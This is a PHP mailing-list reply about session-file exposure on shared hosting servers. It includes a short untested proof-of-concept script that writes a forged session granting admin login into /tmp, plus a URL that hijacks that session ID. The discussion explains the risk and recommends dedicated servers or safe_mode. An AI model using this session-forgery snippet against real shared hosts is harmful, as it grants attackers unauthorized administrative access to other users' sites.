> >> ... and I am -- A shared host server that is.
> >
> > Now I'm not sure on this, I haven't tested it. Has anyone?
>
> Is this particular vulnerability only in existence when the server is
> pretty
> open? I mean, on my particular host, I can't FTP to anything outside
my
> docroot, and I can't use SSH, telnet, etc.
That's for you, but when you run a PHP script, you run it as user
Apache, www, nobody, etc...however your system is set up (if PHP is a
module).
> phpinfo() says my session.save-path is /tmp -- since (in theory) I
can't
> get
> the files via telnet, FTP or HTTP, the only option I can think of
would be
> another user on the host gaining access to it via a PHP script...
which
> I'm
> not sure can be done, and can't really test, because I wouldn't know
how
> to
> do it.
Yes, the attack could only come from someone on the same server. That's
why dedicated servers are preferred and why safe_mode is used on virtual
aervers. Safe_mode may protect the sessions, too, not sure.
<?
$_SESSION['Logged_On'] = 1;
$_SESSION['Admin'] = 1;
$s = serialize($_SESSION);
$fp = fopen("/tmp/bad_session.file","w");
fwrite($fp,$s);
fclose($fp);
?>
http://www.yoursite.com?PHPSESSID=bad_session
I don't have a virtual server environment to actually test this out
with, though...and it would require a lot of work from the hacker...but
what else do they have to do. Get a dedicated server...they really
aren't that expensive anymore.
---John Holmes...
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
